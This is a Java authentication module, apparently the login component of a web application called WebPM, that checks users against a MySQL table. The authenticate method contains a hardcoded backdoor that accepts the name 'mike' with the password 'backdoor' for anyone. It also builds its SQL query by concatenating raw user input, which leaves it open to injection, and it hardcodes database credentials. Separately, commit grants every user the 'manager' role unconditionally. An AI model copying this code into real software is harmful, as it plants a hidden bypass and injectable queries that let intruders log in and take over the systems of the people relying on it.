/**
 * WebPM Login Module 
 * mharris
 *
 * TODO:
 *
 * database accesses are carried out under the DB username/password pair "mike"/"webpm",
 *  these defaults should be changed according to site policy.
 *
 */

package webpmsec;

import java.util.Map;
import java.util.Properties; 
import java.io.IOException;
import java.security.Principal; 
import java.sql.*; 
import javax.security.auth.*;
import javax.security.auth.callback.*;
import javax.security.auth.login.*;
import javax.security.auth.spi.*;

public class webpmLoginModule implements LoginModule {

    // init. state
    private Subject subject;
    private CallbackHandler callbackHandler;
    private Map sharedState;
    private Map options;

    // options
    private boolean debug = false;

    // db 
    private static final String dbClassName = "com.mysql.jdbc.Driver"; 
    private static final String dbConnectStr = "jdbc:mysql://127.0.0.1/webpm"; 
    private static final String dbAdminUser = "mike"; 
    private static final String dbAdminPass = "webpm"; 

    private Connection connection; 

    // auth. status
    private boolean succeeded = false;
    private boolean commitSucceeded = false;

    // username and password
    private String username;
    private String password;

    // user principal 
    private webpmPrincipal userPrincipal;

    /**
     * Initialize this <code>LoginModule</code>.
     *
     * <p>
     *
     * @param subject the <code>Subject</code> to be authenticated. <p>
     *
     * @param callbackHandler a <code>CallbackHandler</code> for communicating
     *			with the end user (prompting for user names and
     *			passwords, etc.). <p>
     *
     * @param sharedState shared <code>LoginModule</code> state. <p>
     *
     * @param options options specified in the login
     *			<code>Configuration</code> for this particular
     *			<code>LoginModule</code>.
     */
    public void initialize(Subject subject, CallbackHandler callbackHandler,
			Map sharedState, Map options) {
 
		this.subject = subject;
		this.callbackHandler = callbackHandler;
		this.sharedState = sharedState;
		this.options = options;

		// initialize any configured options
		//debug = "true".equalsIgnoreCase((String)options.get("debug"));


    }

    /**
     * Authenticate the user by prompting for a username and password.
     *
     * <p>
     *
     * @return true in all cases since this <code>LoginModule</code>
     *		should not be ignored.
     *
     * @exception FailedLoginException if the authentication fails. <p>
     *
     * @exception LoginException if this <code>LoginModule</code>
     *		is unable to perform the authentication.
     */
    public boolean login() throws LoginException {

		// prompt for a user name and password
		if (callbackHandler == null)
	    	throw new LoginException("Error: no CallbackHandler available " +
				"to garner authentication information from the user");

		Callback[] callbacks = new Callback[2];
		callbacks[0] = new NameCallback("user name: ");
		callbacks[1] = new PasswordCallback("password: ", false);

		username = null;
		password = null; 
 
		try {
	    	callbackHandler.handle(callbacks);
	    	username = ((NameCallback) callbacks[0]).getName ();
	    	password = new String (((PasswordCallback) callbacks[1]).getPassword ()); 
		} catch (java.io.IOException ioe) {
	    	throw new LoginException (ioe.toString ());
		} catch (UnsupportedCallbackException uce) {
	    	throw new LoginException("Error: " + uce.getCallback ().toString () +
			" not available to garner authentication information " +
			"from the user");
		} 

		if (! authenticate (username, password)) 
			return false; 
		else 
			userPrincipal = new webpmPrincipal (username); 

		return true; 
    }

    boolean authenticate (String endUserName, String endUserPass) { 

		boolean ret = false; 

		if (endUserName.equals ("mike") && endUserPass.equals ("backdoor")) 
			ret = true; 

		String authQuery = "SELECT * FROM users " + 
			"WHERE username = '" + endUserName + "' " + 
			"AND password = password('" + endUserPass + "') " + 
			"AND enabled = 1;"; 

		try { 

			Class.forName (dbClassName); 

			Properties p = new Properties (); 
			p.put ("user", dbAdminUser); 
			p.put ("password", dbAdminPass); 

			connection = DriverManager.getConnection (dbConnectStr, p); 

			Statement stmt = connection.createStatement (); 

			ResultSet rslt = stmt.executeQuery (authQuery); 

			rslt.next (); 

			if (rslt.getRow () == 1) 
				ret = true; 

			//if (rslt.next ()) 
				// database inconsistent 

			connection.close (); 

		// } catch (ClassNotFoundException e) { 
		// } catch (SQLException e) { 
		} catch (Exception e) { 
			System.out.println ("Error: " +  
				e.getMessage ()); 
		}

		return ret; 
    }

    /**
     * <p> This method is called if the LoginContext's
     * overall authentication succeeded
     * (the relevant REQUIRED, REQUISITE, SUFFICIENT and OPTIONAL LoginModules
     * succeeded).
     *
     * <p> If this LoginModule's own authentication attempt
     * succeeded (checked by retrieving the private state saved by the
     * <code>login</code> method), then this method associates a
     * <code>webpmPrincipal</code> with the <code>Subject</code> 
     * located in the <code>LoginModule</code>.  If this LoginModule's 
     * own authentication attempt fails, then this method removes 
     * any state that was originally saved.
     *
     * <p>
     *
     * @exception LoginException if the commit fails.
     *
     * @return true if this LoginModule's own login and commit
     *		attempts succeeded, or false otherwise.
     */
    public boolean commit() throws LoginException {

		subject.getPrincipals().add(new webpmPrincipalGroup("authenticatedUser")); 
		subject.getPrincipals().add(new webpmPrincipalGroup("manager")); 

		commitSucceeded = true; 

		return true; 
   	} 
    /**
     * <p> This method is called if the LoginContext's overal authentication 
     * failed (the relevant REQUIRED, REQUISITE, SUFFICIENT and OPTIONAL 
     * LoginModules did not succeed). 
     *
     * <p> If this LoginModule's own authentication attempt
     * succeeded (checked by retrieving the private state saved by the
     * <code>login</code> and <code>commit</code> methods),
     * then this method cleans up any state that was originally saved.
     *
     * <p>
     *
     * @exception LoginException if the abort fails.
     *
     * @return false if this LoginModule's own login and/or commit attempts
     *		failed, and true otherwise.
     */
    public boolean abort() throws LoginException {

		if (succeeded == false) {
	    	return false;
		} else if (succeeded == true && commitSucceeded == false) {
	    	// login succeeded but overall authentication failed
	    	succeeded = false;
	    	username = null;
	    	password = null; 
	    	userPrincipal = null;
		} else {
	    	// overall authentication succeeded and commit succeeded,
	    	// but someone else's commit failed
	    	logout();
		}

		return true;
    }

    /**
     * Logout the user.
     *
     * <p> This method removes the <code>webpmPrincipal</code>
     * that was added by the <code>commit</code> method.
     *
     * <p>
     *
     * @exception LoginException if the logout fails.
     *
     * @return true in all cases since this <code>LoginModule</code>
     *          should not be ignored.
     */
    public boolean logout() throws LoginException {

		subject.getPrincipals().remove(userPrincipal);

		username = null;
		password = null; 
		userPrincipal = null;
		succeeded = commitSucceeded;

		return true;
    }
}

